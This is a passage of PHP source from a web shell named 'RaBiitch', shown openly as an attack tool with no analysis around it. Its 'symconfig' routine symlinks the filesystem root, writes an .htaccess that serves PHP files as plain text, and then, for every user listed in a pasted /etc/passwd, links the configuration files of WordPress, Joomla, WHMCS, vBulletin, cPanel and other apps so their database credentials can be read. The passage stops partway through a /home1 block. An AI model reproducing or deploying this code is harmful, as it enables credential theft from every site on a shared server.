  740. echo "Done <a href='RaBiitch_tools/noname.php'>Noname Shell Here</a>";
  741. }
  742. elseif($_GET['RaBiitch'] == 'symconfig') {
  743. if(strtolower(substr(PHP_OS, 0, 3)) == "win"){
  744. echo '<script>alert("Skid this won\'t work on Windows")</script>';
  745. exit;
  746. }
  747. else
  748. {
  749. if($_POST["m"] && !$_POST["passwd"]==""){
  750. @mkdir("RaBiitch_symconf", 0777);
  751. @chdir("RaBiitch_symconf");
  752. @symlink("/","root");
  753. $htaccess="Options Indexes FollowSymLinks
  754. DirectoryIndex c7eisjustice.htm
  755. AddType text/plain .php
  756. AddHandler text/plain .php
  757. Satisfy Any";
  758. @file_put_contents(".htaccess",$htaccess);
  759. $etc_passwd=$_POST["passwd"];
  760. $etc_passwd=explode("\n",$etc_passwd);
  761. foreach($etc_passwd as $passwd){
  762. $pawd=explode(":",$passwd);
  763. $user =$pawd[0];
  764.  
  765. @symlink('/','RaBiitch_symconf/root');
  766. @symlink('/home/'.$user.'/public_html/vb/includes/config.php',$user.'-Vbulletin.txt');
  767. @symlink('/home/'.$user.'/public_html/includes/config.php',$user.'-Vbulletin.txt');
  768. @symlink('/home/'.$user.'/public_html/forum/includes/config.php',$user.'-Vbulletin.txt');
  769. @symlink('/home/'.$user.'/public_html/forums/includes/config.php',$user.'-Vbulletin.txt');
  770. @symlink('/home/'.$user.'/public_html/cc/includes/config.php',$user.'-Vbulletin.txt');
  771. @symlink('/home/'.$user.'/public_html/inc/config.php',$user.'-MyBB.txt');
  772. @symlink('/home/'.$user.'/public_html/includes/configure.php',$user.'-OsCommerce.txt');
  773. @symlink('/home/'.$user.'/public_html/shop/includes/configure.php',$user.'-OsCommerce.txt');
  774. @symlink('/home/'.$user.'/public_html/os/includes/configure.php',$user.'-OsCommerce.txt');
  775. @symlink('/home/'.$user.'/public_html/oscom/includes/configure.php',$user.'-OsCommerce.txt');
  776. @symlink('/home/'.$user.'/public_html/products/includes/configure.php',$user.'-OsCommerce.txt');
  777. @symlink('/home/'.$user.'/public_html/cart/includes/configure.php',$user.'-OsCommerce.txt');
  778. @symlink('/home/'.$user.'/public_html/inc/conf_global.php',$user.'-IPB.txt');
  779. @symlink('/home/'.$user.'/public_html/wp-config.php',$user.'-Wordpress.txt');
  780. @symlink('/home/'.$user.'/public_html/wp/test/wp-config.php',$user.'-Wordpress.txt');
  781. @symlink('/home/'.$user.'/public_html/blog/wp-config.php',$user.'-Wordpress.txt');
  782. @symlink('/home/'.$user.'/public_html/beta/wp-config.php',$user.'-Wordpress.txt');
  783. @symlink('/home/'.$user.'/public_html/portal/wp-config.php',$user.'-Wordpress.txt');
  784. @symlink('/home/'.$user.'/public_html/site/wp-config.php',$user.'-Wordpress.txt');
  785. @symlink('/home/'.$user.'/public_html/wp/wp-config.php',$user.'-Wordpress.txt');
  786. @symlink('/home/'.$user.'/public_html/WP/wp-config.php',$user.'-Wordpress.txt');
  787. @symlink('/home/'.$user.'/public_html/news/wp-config.php',$user.'-Wordpress.txt');
  788. @symlink('/home/'.$user.'/public_html/wordpress/wp-config.php',$user.'-Wordpress.txt');
  789. @symlink('/home/'.$user.'/public_html/test/wp-config.php',$user.'-Wordpress.txt');
  790. @symlink('/home/'.$user.'/public_html/demo/wp-config.php',$user.'-Wordpress.txt');
  791. @symlink('/home/'.$user.'/public_html/home/wp-config.php',$user.'-Wordpress.txt');
  792. @symlink('/home/'.$user.'/public_html/v1/wp-config.php',$user.'-Wordpress.txt');
  793. @symlink('/home/'.$user.'/public_html/v2/wp-config.php',$user.'-Wordpress.txt');
  794. @symlink('/home/'.$user.'/public_html/press/wp-config.php',$user.'-Wordpress.txt');
  795. @symlink('/home/'.$user.'/public_html/new/wp-config.php',$user.'-Wordpress.txt');
  796. @symlink('/home/'.$user.'/public_html/blogs/wp-config.php',$user.'-Wordpress.txt');
  797. @symlink('/home/'.$user.'/public_html/configuration.php',$user.'-Joomla.txt');
  798. @symlink('/home/'.$user.'/public_html/blog/configuration.php',$user.'-Joomla.txt');
  799. @symlink('/home/'.$user.'/public_html/submitticket.php',$user.'-^WHMCS.txt');
  800. @symlink('/home/'.$user.'/public_html/cms/configuration.php',$user.'-Joomla.txt');
  801. @symlink('/home/'.$user.'/public_html/beta/configuration.php',$user.'-Joomla.txt');
  802. @symlink('/home/'.$user.'/public_html/portal/configuration.php',$user.'-Joomla.txt');
  803. @symlink('/home/'.$user.'/public_html/site/configuration.php',$user.'-Joomla.txt');
  804. @symlink('/home/'.$user.'/public_html/main/configuration.php',$user.'-Joomla.txt');
  805. @symlink('/home/'.$user.'/public_html/home/configuration.php',$user.'-Joomla.txt');
  806. @symlink('/home/'.$user.'/public_html/demo/configuration.php',$user.'-Joomla.txt');
  807. @symlink('/home/'.$user.'/public_html/test/configuration.php',$user.'-Joomla.txt');
  808. @symlink('/home/'.$user.'/public_html/v1/configuration.php',$user.'-Joomla.txt');
  809. @symlink('/home/'.$user.'/public_html/v2/configuration.php',$user.'-Joomla.txt');
  810. @symlink('/home/'.$user.'/public_html/joomla/configuration.php',$user.'-Joomla.txt');
  811. @symlink('/home/'.$user.'/public_html/new/configuration.php',$user.'-Joomla.txt');
  812. @symlink('/home/'.$user.'/public_html/WHMCS/configuration.php',$user.'-WHMCS.txt');
  813. @symlink('/home/'.$user.'/public_html/whmcs1/configuration.php',$user.'-WHMCS.txt');
  814. @symlink('/home/'.$user.'/public_html/Whmcs/configuration.php',$user.'-WHMCS.txt');
  815. @symlink('/home/'.$user.'/public_html/whmcs/configuration.php',$user.'-WHMCS.txt');
  816. @symlink('/home/'.$user.'/public_html/whmcs/configuration.php',$user.'-WHMCS.txt');
  817. @symlink('/home/'.$user.'/public_html/WHMC/configuration.php',$user.'-WHMCS.txt');
  818. @symlink('/home/'.$user.'/public_html/Whmc/configuration.php',$user.'-WHMCS.txt');
  819. @symlink('/home/'.$user.'/public_html/whmc/configuration.php',$user.'-WHMCS.txt');
  820. @symlink('/home/'.$user.'/public_html/WHM/configuration.php',$user.'-WHMCS.txt');
  821. @symlink('/home/'.$user.'/public_html/Whm/configuration.php',$user.'-WHMCS.txt');
  822. @symlink('/home/'.$user.'/public_html/whm/configuration.php',$user.'-WHMCS.txt');
  823. @symlink('/home/'.$user.'/public_html/HOST/configuration.php',$user.'-WHMCS.txt');
  824. @symlink('/home/'.$user.'/public_html/Host/configuration.php',$user.'-WHMCS.txt');
  825. @symlink('/home/'.$user.'/public_html/host/configuration.php',$user.'-WHMCS.txt');
  826. @symlink('/home/'.$user.'/public_html/SUPPORTES/configuration.php',$user.'-WHMCS.txt');
  827. @symlink('/home/'.$user.'/public_html/Supportes/configuration.php',$user.'-WHMCS.txt');
  828. @symlink('/home/'.$user.'/public_html/supportes/configuration.php',$user.'-WHMCS.txt');
  829. @symlink('/home/'.$user.'/public_html/domains/configuration.php',$user.'-WHMCS.txt');
  830. @symlink('/home/'.$user.'/public_html/domain/configuration.php',$user.'-WHMCS.txt');
  831. @symlink('/home/'.$user.'/public_html/Hosting/configuration.php',$user.'-WHMCS.txt');
  832. @symlink('/home/'.$user.'/public_html/HOSTING/configuration.php',$user.'-WHMCS.txt');
  833. @symlink('/home/'.$user.'/public_html/hosting/configuration.php',$user.'-WHMCS.txt');
  834. @symlink('/home/'.$user.'/public_html/CART/configuration.php',$user.'-WHMCS.txt');
  835. @symlink('/home/'.$user.'/public_html/Cart/configuration.php',$user.'-WHMCS.txt');
  836. @symlink('/home/'.$user.'/public_html/cart/configuration.php',$user.'-WHMCS.txt');
  837. @symlink('/home/'.$user.'/public_html/ORDER/configuration.php',$user.'-WHMCS.txt');
  838. @symlink('/home/'.$user.'/public_html/Order/configuration.php',$user.'-WHMCS.txt');
  839. @symlink('/home/'.$user.'/public_html/order/configuration.php',$user.'-WHMCS.txt');
  840. @symlink('/home/'.$user.'/public_html/CLIENT/configuration.php',$user.'-WHMCS.txt');
  841. @symlink('/home/'.$user.'/public_html/Client/configuration.php',$user.'-WHMCS.txt');
  842. @symlink('/home/'.$user.'/public_html/client/configuration.php',$user.'-WHMCS.txt');
  843. @symlink('/home/'.$user.'/public_html/CLIENTAREA/configuration.php',$user.'-WHMCS.txt');
  844. @symlink('/home/'.$user.'/public_html/Clientarea/configuration.php',$user.'-WHMCS.txt');
  845. @symlink('/home/'.$user.'/public_html/clientarea/configuration.php',$user.'-WHMCS.txt');
  846. @symlink('/home/'.$user.'/public_html/SUPPORT/configuration.php',$user.'-WHMCS.txt');
  847. @symlink('/home/'.$user.'/public_html/Support/configuration.php',$user.'-WHMCS.txt');
  848. @symlink('/home/'.$user.'/public_html/support/configuration.php',$user.'-WHMCS.txt');
  849. @symlink('/home/'.$user.'/public_html/BILLING/configuration.php',$user.'-WHMCS.txt');
  850. @symlink('/home/'.$user.'/public_html/Billing/configuration.php',$user.'-WHMCS.txt');
  851. @symlink('/home/'.$user.'/public_html/billing/configuration.php',$user.'-WHMCS.txt');
  852. @symlink('/home/'.$user.'/public_html/BUY/configuration.php',$user.'-WHMCS.txt');
  853. @symlink('/home/'.$user.'/public_html/Buy/configuration.php',$user.'-WHMCS.txt');
  854. @symlink('/home/'.$user.'/public_html/buy/configuration.php',$user.'-WHMCS.txt');
  855. @symlink('/home/'.$user.'/public_html/MANAGE/configuration.php',$user.'-WHMCS.txt');
  856. @symlink('/home/'.$user.'/public_html/Manage/configuration.php',$user.'-WHMCS.txt');
  857. @symlink('/home/'.$user.'/public_html/manage/configuration.php',$user.'-WHMCS.txt');
  858. @symlink('/home/'.$user.'/public_html/CLIENTSUPPORT/configuration.php',$user.'-WHMCS.txt');
  859. @symlink('/home/'.$user.'/public_html/ClientSupport/configuration.php',$user.'-WHMCS.txt');
  860. @symlink('/home/'.$user.'/public_html/Clientsupport/configuration.php',$user.'-WHMCS.txt');
  861. @symlink('/home/'.$user.'/public_html/clientsupport/configuration.php',$user.'-WHMCS.txt');
  862. @symlink('/home/'.$user.'/public_html/CHECKOUT/configuration.php',$user.'-WHMCS.txt');
  863. @symlink('/home/'.$user.'/public_html/Checkout/configuration.php',$user.'-WHMCS.txt');
  864. @symlink('/home/'.$user.'/public_html/checkout/configuration.php',$user.'-WHMCS.txt');
  865. @symlink('/home/'.$user.'/public_html/BILLINGS/configuration.php',$user.'-WHMCS.txt');
  866. @symlink('/home/'.$user.'/public_html/Billings/configuration.php',$user.'-WHMCS.txt');
  867. @symlink('/home/'.$user.'/public_html/billings/configuration.php',$user.'-WHMCS.txt');
  868. @symlink('/home/'.$user.'/public_html/BASKET/configuration.php',$user.'-WHMCS.txt');
  869. @symlink('/home/'.$user.'/public_html/Basket/configuration.php',$user.'-WHMCS.txt');
  870. @symlink('/home/'.$user.'/public_html/basket/configuration.php',$user.'-WHMCS.txt');
  871. @symlink('/home/'.$user.'/public_html/SECURE/configuration.php',$user.'-WHMCS.txt');
  872. @symlink('/home/'.$user.'/public_html/Secure/configuration.php',$user.'-WHMCS.txt');
  873. @symlink('/home/'.$user.'/public_html/secure/configuration.php',$user.'-WHMCS.txt');
  874. @symlink('/home/'.$user.'/public_html/SALES/configuration.php',$user.'-WHMCS.txt');
  875. @symlink('/home/'.$user.'/public_html/Sales/configuration.php',$user.'-WHMCS.txt');
  876. @symlink('/home/'.$user.'/public_html/sales/configuration.php',$user.'-WHMCS.txt');
  877. @symlink('/home/'.$user.'/public_html/BILL/configuration.php',$user.'-WHMCS.txt');
  878. @symlink('/home/'.$user.'/public_html/Bill/configuration.php',$user.'-WHMCS.txt');
  879. @symlink('/home/'.$user.'/public_html/bill/configuration.php',$user.'-WHMCS.txt');
  880. @symlink('/home/'.$user.'/public_html/PURCHASE/configuration.php',$user.'-WHMCS.txt');
  881. @symlink('/home/'.$user.'/public_html/Purchase/configuration.php',$user.'-WHMCS.txt');
  882. @symlink('/home/'.$user.'/public_html/purchase/configuration.php',$user.'-WHMCS.txt');
  883. @symlink('/home/'.$user.'/public_html/ACCOUNT/configuration.php',$user.'-WHMCS.txt');
  884. @symlink('/home/'.$user.'/public_html/Account/configuration.php',$user.'-WHMCS.txt');
  885. @symlink('/home/'.$user.'/public_html/account/configuration.php',$user.'-WHMCS.txt');
  886. @symlink('/home/'.$user.'/public_html/USER/configuration.php',$user.'-WHMCS.txt');
  887. @symlink('/home/'.$user.'/public_html/User/configuration.php',$user.'-WHMCS.txt');
  888. @symlink('/home/'.$user.'/public_html/user/configuration.php',$user.'-WHMCS.txt');
  889. @symlink('/home/'.$user.'/public_html/CLIENTS/configuration.php',$user.'-WHMCS.txt');
  890. @symlink('/home/'.$user.'/public_html/Clients/configuration.php',$user.'-WHMCS.txt');
  891. @symlink('/home/'.$user.'/public_html/clients/configuration.php',$user.'-WHMCS.txt');
  892. @symlink('/home/'.$user.'/public_html/BILLINGS/configuration.php',$user.'-WHMCS.txt');
  893. @symlink('/home/'.$user.'/public_html/Billings/configuration.php',$user.'-WHMCS.txt');
  894. @symlink('/home/'.$user.'/public_html/billings/configuration.php',$user.'-WHMCS.txt');
  895. @symlink('/home/'.$user.'/public_html/MY/configuration.php',$user.'-WHMCS.txt');
  896. @symlink('/home/'.$user.'/public_html/My/configuration.php',$user.'-WHMCS.txt');
  897. @symlink('/home/'.$user.'/public_html/my/configuration.php',$user.'-WHMCS.txt');
  898. @symlink('/home/'.$user.'/public_html/secure/whm/configuration.php',$user.'-WHMCS.txt');
  899. @symlink('/home/'.$user.'/public_html/secure/whmcs/configuration.php',$user.'-WHMCS.txt');
  900. @symlink('/home/'.$user.'/public_html/panel/configuration.php',$user.'-WHMCS.txt');
  901. @symlink('/home/'.$user.'/public_html/clientes/configuration.php',$user.'-WHMCS.txt');
  902. @symlink('/home/'.$user.'/public_html/cliente/configuration.php',$user.'-WHMCS.txt');
  903. @symlink('/home/'.$user.'/public_html/support/order/configuration.php',$user.'-WHMCS.txt');
  904. @symlink('/home/'.$user.'/public_html/bb-config.php',$user.'-BoxBilling.txt');
  905. @symlink('/home/'.$user.'/public_html/boxbilling/bb-config.php',$user.'-BoxBilling.txt');
  906. @symlink('/home/'.$user.'/public_html/box/bb-config.php',$user.'-BoxBilling.txt');
  907. @symlink('/home/'.$user.'/public_html/host/bb-config.php',$user.'-BoxBilling.txt');
  908. @symlink('/home/'.$user.'/public_html/Host/bb-config.php',$user.'-BoxBilling.txt');
  909. @symlink('/home/'.$user.'/public_html/supportes/bb-config.php',$user.'-BoxBilling.txt');
  910. @symlink('/home/'.$user.'/public_html/support/bb-config.php',$user.'-BoxBilling.txt');
  911. @symlink('/home/'.$user.'/public_html/hosting/bb-config.php',$user.'-BoxBilling.txt');
  912. @symlink('/home/'.$user.'/public_html/cart/bb-config.php',$user.'-BoxBilling.txt');
  913. @symlink('/home/'.$user.'/public_html/order/bb-config.php',$user.'-BoxBilling.txt');
  914. @symlink('/home/'.$user.'/public_html/client/bb-config.php',$user.'-BoxBilling.txt');
  915. @symlink('/home/'.$user.'/public_html/clients/bb-config.php',$user.'-BoxBilling.txt');
  916. @symlink('/home/'.$user.'/public_html/cliente/bb-config.php',$user.'-BoxBilling.txt');
  917. @symlink('/home/'.$user.'/public_html/clientes/bb-config.php',$user.'-BoxBilling.txt');
  918. @symlink('/home/'.$user.'/public_html/billing/bb-config.php',$user.'-BoxBilling.txt');
  919. @symlink('/home/'.$user.'/public_html/billings/bb-config.php',$user.'-BoxBilling.txt');
  920. @symlink('/home/'.$user.'/public_html/my/bb-config.php',$user.'-BoxBilling.txt');
  921. @symlink('/home/'.$user.'/public_html/secure/bb-config.php',$user.'-BoxBilling.txt');
  922. @symlink('/home/'.$user.'/public_html/support/order/bb-config.php',$user.'-BoxBilling.txt');
  923. @symlink('/home/'.$user.'/public_html/includes/dist-configure.php',$user.'-Zencart.txt');
  924. @symlink('/home/'.$user.'/public_html/zencart/includes/dist-configure.php',$user.'-Zencart.txt');
  925. @symlink('/home/'.$user.'/public_html/products/includes/dist-configure.php',$user.'-Zencart.txt');
  926. @symlink('/home/'.$user.'/public_html/cart/includes/dist-configure.php',$user.'-Zencart.txt');
  927. @symlink('/home/'.$user.'/public_html/shop/includes/dist-configure.php',$user.'-Zencart.txt');
  928. @symlink('/home/'.$user.'/public_html/includes/iso4217.php',$user.'-Hostbills.txt');
  929. @symlink('/home/'.$user.'/public_html/hostbills/includes/iso4217.php',$user.'-Hostbills.txt');
  930. @symlink('/home/'.$user.'/public_html/host/includes/iso4217.php',$user.'-Hostbills.txt');
  931. @symlink('/home/'.$user.'/public_html/Host/includes/iso4217.php',$user.'-Hostbills.txt');
  932. @symlink('/home/'.$user.'/public_html/supportes/includes/iso4217.php',$user.'-Hostbills.txt');
  933. @symlink('/home/'.$user.'/public_html/support/includes/iso4217.php',$user.'-Hostbills.txt');
  934. @symlink('/home/'.$user.'/public_html/hosting/includes/iso4217.php',$user.'-Hostbills.txt');
  935. @symlink('/home/'.$user.'/public_html/cart/includes/iso4217.php',$user.'-Hostbills.txt');
  936. @symlink('/home/'.$user.'/public_html/order/includes/iso4217.php',$user.'-Hostbills.txt');
  937. @symlink('/home/'.$user.'/public_html/client/includes/iso4217.php',$user.'-Hostbills.txt');
  938. @symlink('/home/'.$user.'/public_html/clients/includes/iso4217.php',$user.'-Hostbills.txt');
  939. @symlink('/home/'.$user.'/public_html/cliente/includes/iso4217.php',$user.'-Hostbills.txt');
  940. @symlink('/home/'.$user.'/public_html/clientes/includes/iso4217.php',$user.'-Hostbills.txt');
  941. @symlink('/home/'.$user.'/public_html/billing/includes/iso4217.php',$user.'-Hostbills.txt');
  942. @symlink('/home/'.$user.'/public_html/billings/includes/iso4217.php',$user.'-Hostbills.txt');
  943. @symlink('/home/'.$user.'/public_html/my/includes/iso4217.php',$user.'-Hostbills.txt');
  944. @symlink('/home/'.$user.'/public_html/secure/includes/iso4217.php',$user.'-Hostbills.txt');
  945. @symlink('/home/'.$user.'/public_html/support/order/includes/iso4217.php',$user.'-Hostbills.txt');
  946. @symlink('/home/'.$user.'/.my.cnf',$user.'-Cpanel.txt');
  947. @symlink('/home/'.$user.'/public_html/po-content/config.php',$user.'-Popoji.txt');
  948.  
  949. //Home1
  950.  
  951. @symlink('/home1/'.$user.'/public_html/vb/includes/config.php',$user.'-Vbulletin.txt');
  952. @symlink('/home1/'.$user.'/public_html/includes/config.php',$user.'-Vbulletin.txt');
  953. @symlink('/home1/'.$user.'/public_html/forum/includes/config.php',$user.'-Vbulletin.txt');
  954. @symlink('/home1/'.$user.'/public_html/forums/includes/config.php',$user.'-Vbulletin.txt');
  955. @symlink('/home1/'.$user.'/public_html/cc/includes/config.php',$user.'-Vbulletin.txt');
  956. @symlink('/home1/'.$user.'/public_html/inc/config.php',$user.'-MyBB.txt');
  957. @symlink('/home1/'.$user.'/public_html/includes/configure.php',$user.'-OsCommerce.txt');
  958. @symlink('/home1/'.$user.'/public_html/shop/includes/configure.php',$user.'-OsCommerce.txt');
  959. @symlink('/home1/'.$user.'/public_html/os/includes/configure.php',$user.'-OsCommerce.txt');
  960. @symlink('/home1/'.$user.'/public_html/oscom/includes/configure.php',$user.'-OsCommerce.txt');
  961. @symlink('/home1/'.$user.'/public_html/products/includes/configure.php',$user.'-OsCommerce.txt');
  962. @symlink('/home1/'.$user.'/public_html/cart/includes/configure.php',$user.'-OsCommerce.txt');
  963. @symlink('/home1/'.$user.'/public_html/inc/conf_global.php',$user.'-IPB.txt');
  964. @symlink('/home1/'.$user.'/public_html/wp-config.php',$user.'-Wordpress.txt');
  965. @symlink('/home1/'.$user.'/public_html/wp/test/wp-config.php',$user.'-Wordpress.txt');
  966. @symlink('/home1/'.$user.'/public_html/blog/wp-config.php',$user.'-Wordpress.txt');
  967. @symlink('/home1/'.$user.'/public_html/beta/wp-config.php',$user.'-Wordpress.txt');
  968. @symlink('/home1/'.$user.'/public_html/portal/wp-config.php',$user.'-Wordpress.txt');
  969. @symlink('/home1/'.$user.'/public_html/site/wp-config.php',$user.'-Wordpress.txt');
  970. @symlink('/home1/'.$user.'/public_html/wp/wp-config.php',$user.'-Wordpress.txt');
  971. @symlink('/home1/'.$user.'/public_html/WP/wp-config.php',$user.'-Wordpress.txt');
  972. @symlink('/home1/'.$user.'/public_html/news/wp-config.php',$user.'-Wordpress.txt');
  973. @symlink('/home1/'.$user.'/public_html/wordpress/wp-config.php',$user.'-Wordpress.txt');
  974. @symlink('/home1/'.$user.'/public_html/test/wp-config.php',$user.'-Wordpress.txt');
  975. @symlink('/home1/'.$user.'/public_html/demo/wp-config.php',$user.'-Wordpress.txt');
  976. @symlink('/home1/'.$user.'/public_html/home/wp-config.php',$user.'-Wordpress.txt');
  977. @symlink('/home1/'.$user.'/public_html/v1/wp-config.php',$user.'-Wordpress.txt');
  978. @symlink('/home1/'.$user.'/public_html/v2/wp-config.php',$user.'-Wordpress.txt');
  979. @symlink('/home1/'.$user.'/public_html/press/wp-config.php',$user.'-Wordpress.txt');
  980. @symlink('/home1/'.$user.'/public_html/new/wp-config.php',$user.'-Wordpress.txt');
  981. @symlink('/home1/'.$user.'/public_html/blogs/wp-config.php',$user.'-Wordpress.txt');
  982. @symlink('/home1/'.$user.'/public_html/configuration.php',$user.'-Joomla.txt');
  983. @symlink('/home1/'.$user.'/public_html/blog/configuration.php',$user.'-Joomla.txt');
  984. @symlink('/home1/'.$user.'/public_html/submitticket.php',$user.'-^WHMCS.txt');
  985. @symlink('/home1/'.$user.'/public_html/cms/configuration.php',$user.'-Joomla.txt');
  986. @symlink('/home1/'.$user.'/public_html/beta/configuration.php',$user.'-Joomla.txt');
  987. @symlink('/home1/'.$user.'/public_html/portal/configuration.php',$user.'-Joomla.txt');
  988. @symlink('/home1/'.$user.'/public_html/site/configuration.php',$user.'-Joomla.txt');
  989. @symlink('/home1/'.$user.'/public_html/main/configuration.php',$user.'-Joomla.txt');
  990. @symlink('/home1/'.$user.'/public_html/home/configuration.php',$user.'-Joomla.txt');
  991. @symlink('/home1/'.$user.'/public_html/demo/configuration.php',$user.'-Joomla.txt');
  992. @symlink('/home1/'.$user.'/public_html/test/configuration.php',$user.'-Joomla.txt');
  993. @symlink('/home1/'.$user.'/public_html/v1/configuration.php',$user.'-Joomla.txt');
  994. @symlink('/home1/'.$user.'/public_html/v2/configuration.php',$user.'-Joomla.txt');
  995. @symlink('/home1/'.$user.'/public_html/joomla/configuration.php',$user.'-Joomla.txt');
  996. @symlink('/home1/'.$user.'/public_html/new/configuration.php',$user.'-Joomla.txt');
  997. @symlink('/home1/'.$user.'/public_html/WHMCS/configuration.php',$user.'-WHMCS.txt');
  998. @symlink('/home1/'.$user.'/public_html/whmcs1/configuration.php',$user.'-WHMCS.txt');
  999. @symlink('/home1/'.$user.'/public_html/Whmcs/configuration.php',$user.'-WHMCS.txt');
  1000. @symlink('/home1/'.$user.'/public_html/whmcs/configuration.php',$user.'-WHMCS.txt');
  1001. @symlink('/home1/'.$user.'/public_html/whmcs/configuration.php',$user.'-WHMCS.txt');
  1002. @symlink('/home1/'.$user.'/public_html/WHMC/configuration.php',$user.'-WHMCS.txt');
  1003. @symlink('/home1/'.$user.'/public_html/Whmc/configuration.php',$user.'-WHMCS.txt');
  1004. @symlink('/home1/'.$user.'/public_html/whmc/configuration.php',$user.'-WHMCS.txt');
  1005. @symlink('/home1/'.$user.'/public_html/WHM/configuration.php',$user.'-WHMCS.txt');
  1006. @symlink('/home1/'.$user.'/public_html/Whm/configuration.php',$user.'-WHMCS.txt');
  1007. @symlink('/home1/'.$user.'/public_html/whm/configuration.php',$user.'-WHMCS.txt');
  1008. @symlink('/home1/'.$user.'/public_html/HOST/configuration.php',$user.'-WHMCS.txt');
  1009. @symlink('/home1/'.$user.'/public_html/Host/configuration.php',$user.'-WHMCS.txt');
  1010. @symlink('/home1/'.$user.'/public_html/host/configuration.php',$user.'-WHMCS.txt');
  1011. @symlink('/home1/'.$user.'/public_html/SUPPORTES/configuration.php',$user.'-WHMCS.txt');
  1012. @symlink('/home1/'.$user.'/public_html/Supportes/configuration.php',$user.'-WHMCS.txt');
  1013. @symlink('/home1/'.$user.'/public_html/supportes/configuration.php',$user.'-WHMCS.txt');
  1014. @symlink('/home1/'.$user.'/public_html/domains/configuration.php',$user.'-WHMCS.txt');
  1015. @symlink('/home1/'.$user.'/public_html/domain/configuration.php',$user.'-WHMCS.txt');
  1016. @symlink('/home1/'.$user.'/public_html/Hosting/configuration.php',$user.'-WHMCS.txt');
  1017. @symlink('/home1/'.$user.'/public_html/HOSTING/configuration.php',$user.'-WHMCS.txt');
  1018. @symlink('/home1/'.$user.'/public_html/hosting/configuration.php',$user.'-WHMCS.txt');
  1019. @symlink('/home1/'.$user.'/public_html/CART/configuration.php',$user.'-WHMCS.txt');
  1020. @symlink('/home1/'.$user.'/public_html/Cart/configuration.php',$user.'-WHMCS.txt');
  1021. @symlink('/home1/'.$user.'/public_html/cart/configuration.php',$user.'-WHMCS.txt');
  1022. @symlink('/home1/'.$user.'/public_html/ORDER/configuration.php',$user.'-WHMCS.txt');
  1023. @symlink('/home1/'.$user.'/public_html/Order/configuration.php',$user.'-WHMCS.txt');
  1024. @symlink('/home1/'.$user.'/public_html/order/configuration.php',$user.'-WHMCS.txt');
  1025. @symlink('/home1/'.$user.'/public_html/CLIENT/configuration.php',$user.'-WHMCS.txt');
  1026. @symlink('/home1/'.$user.'/public_html/Client/configuration.php',$user.'-WHMCS.txt');
  1027. @symlink('/home1/'.$user.'/public_html/client/configuration.php',$user.'-WHMCS.txt');
  1028. @symlink('/home1/'.$user.'/public_html/CLIENTAREA/configuration.php',$user.'-WHMCS.txt');
  1029. @symlink('/home1/'.$user.'/public_html/Clientarea/configuration.php',$user.'-WHMCS.txt');
  1030. @symlink('/home1/'.$user.'/public_html/clientarea/configuration.php',$user.'-WHMCS.txt');
  1031. @symlink('/home1/'.$user.'/public_html/SUPPORT/configuration.php',$user.'-WHMCS.txt');
  1032. @symlink('/home1/'.$user.'/public_html/Support/configuration.php',$user.'-WHMCS.txt');
  1033. @symlink('/home1/'.$user.'/public_html/support/configuration.php',$user.'-WHMCS.txt');
  1034. @symlink('/home1/'.$user.'/public_html/BILLING/configuration.php',$user.'-WHMCS.txt');
  1035. @symlink('/home1/'.$user.'/public_html/Billing/configuration.php',$user.'-WHMCS.txt');
  1036. @symlink('/home1/'.$user.'/public_html/billing/configuration.php',$user.'-WHMCS.txt');
  1037. @symlink('/home1/'.$user.'/public_html/BUY/configuration.php',$user.'-WHMCS.txt');
  1038. @symlink('/home1/'.$user.'/public_html/Buy/configuration.php',$user.'-WHMCS.txt');
  1039. @symlink('/home1/'.$user.'/public_html/buy/configuration.php',$user.'-WHMCS.txt');
  1040. @symlink('/home1/'.$user.'/public_html/MANAGE/configuration.php',$user.'-WHMCS.txt');
  1041. @symlink('/home1/'.$user.'/public_html/Manage/configuration.php',$user.'-WHMCS.txt');
  1042. @symlink('/home1/'.$user.'/public_html/manage/configuration.php',$user.'-WHMCS.txt');
  1043. @symlink('/home1/'.$user.'/public_html/CLIENTSUPPORT/configuration.php',$user.'-WHMCS.txt');
  1044. @symlink('/home1/'.$user.'/public_html/ClientSupport/configuration.php',$user.'-WHMCS.txt');
  1045. @symlink('/home1/'.$user.'/public_html/Clientsupport/configuration.php',$user.'-WHMCS.txt');
  1046. @symlink('/home1/'.$user.'/public_html/clientsupport/configuration.php',$user.'-WHMCS.txt');
  1047. @symlink('/home1/'.$user.'/public_html/CHECKOUT/configuration.php',$user.'-WHMCS.txt');
  1048. @symlink('/home1/'.$user.'/public_html/Checkout/configuration.php',$user.'-WHMCS.txt');
  1049. @symlink('/home1/'.$user.'/public_html/checkout/configuration.php',$user.'-WHMCS.txt');
  1050. @symlink('/home1/'.$user.'/public_html/BILLINGS/configuration.php',$user.'-WHMCS.txt');
  1051. @symlink('/home1/'.$user.'/public_html/Billings/configuration.php',$user.'-WHMCS.txt');
  1052. @symlink('/home1/'.$user.'/public_html/billings/configuration.php',$user.'-WHMCS.txt');
  1053. @symlink('/home1/'.$user.'/public_html/BASKET/configuration.php',$user.'-WHMCS.txt');
  1054. @symlink('/home1/'.$user.'/public_html/Basket/configuration.php',$user.'-WHMCS.txt');
  1055. @symlink('/home1/'.$user.'/public_html/basket/configuration.php',$user.'-WHMCS.txt');
  1056. @symlink('/home1/'.$user.'/public_html/SECURE/configuration.php',$user.'-WHMCS.txt');
  1057. @symlink('/home1/'.$user.'/public_html/Secure/configuration.php',$user.'-WHMCS.txt');
  1058. @symlink('/home1/'.$user.'/public_html/secure/configuration.php',$user.'-WHMCS.txt');
  1059. @symlink('/home1/'.$user.'/public_html/SALES/configuration.php',$user.'-WHMCS.txt');
  1060. @symlink('/home1/'.$user.'/public_html/Sales/configuration.php',$user.'-WHMCS.txt');
  1061. @symlink('/home1/'.$user.'/public_html/sales/configuration.php',$user.'-WHMCS.txt');
  1062. @symlink('/home1/'.$user.'/public_html/BILL/configuration.php',$user.'-WHMCS.txt');
  1063. @symlink('/home1/'.$user.'/public_html/Bill/configuration.php',$user.'-WHMCS.txt');
  1064. @symlink('/home1/'.$user.'/public_html/bill/configuration.php',$user.'-WHMCS.txt');
  1065. @symlink('/home1/'.$user.'/public_html/PURCHASE/configuration.php',$user.'-WHMCS.txt');
  1066. @symlink('/home1/'.$user.'/public_html/Purchase/configuration.php',$user.'-WHMCS.txt');
  1067. @symlink('/home1/'.$user.'/public_html/purchase/configuration.php',$user.'-WHMCS.txt');
  1068. @symlink('/home1/'.$user.'/public_html/ACCOUNT/configuration.php',$user.'-WHMCS.txt');
  1069. @symlink('/home1/'.$user.'/public_html/Account/configuration.php',$user.'-WHMCS.txt');
  1070. @symlink('/home1/'.$user.'/public_html/account/configuration.php',$user.'-WHMCS.txt');
